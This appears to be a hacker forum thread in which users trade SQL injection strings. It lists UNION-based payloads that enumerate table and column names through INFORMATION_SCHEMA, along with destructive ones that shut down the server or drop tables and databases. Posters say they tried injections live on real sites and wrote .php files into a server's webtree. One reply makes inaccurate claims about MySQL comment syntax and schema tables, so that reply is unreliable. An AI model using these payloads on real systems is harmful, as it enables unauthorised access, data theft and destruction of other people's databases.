Still in his sig

Can't change it! But I wrote him and I hope he writes back so that we can talk about that issue.

never forget the power of teamwork+ntfs

whatever' UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
or (better):
whatever' UNION SELECT min( TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES--
or:
whatever' UNION SELECT min( TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME >'%a%'--

The same thing with columns:
whatever' UNION SELECT min(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS--

There are pretty good tuts on the net, and I tried some injections myself (live! - lol), but I didn't devastate it so much,
The strings I like:
whatever'; shutdown with nowait--
and
whatever' drop table xxx--
and the most powerful:
whatever' drop database <need to guess db>

Hi velo,

are you sure this works with *mysql* and not with MS SQL ODBC Driver ? I wonder because iam pretty sure there is no information_ table in mysql and your delemiters to end the query "--" are used in MSSQL, in MYSQL u use "*/"

thx
Ray

I've been playing with sql injection over mysql for a long time. In some cases I've been able to make nice things like creating .php files in a server's webtree, but never been able to find a way to get the table names other than guessing. I would be very pleased to know if there's a way to perform this on mysql. I don't mean there's no way to do it, but I don't know how to.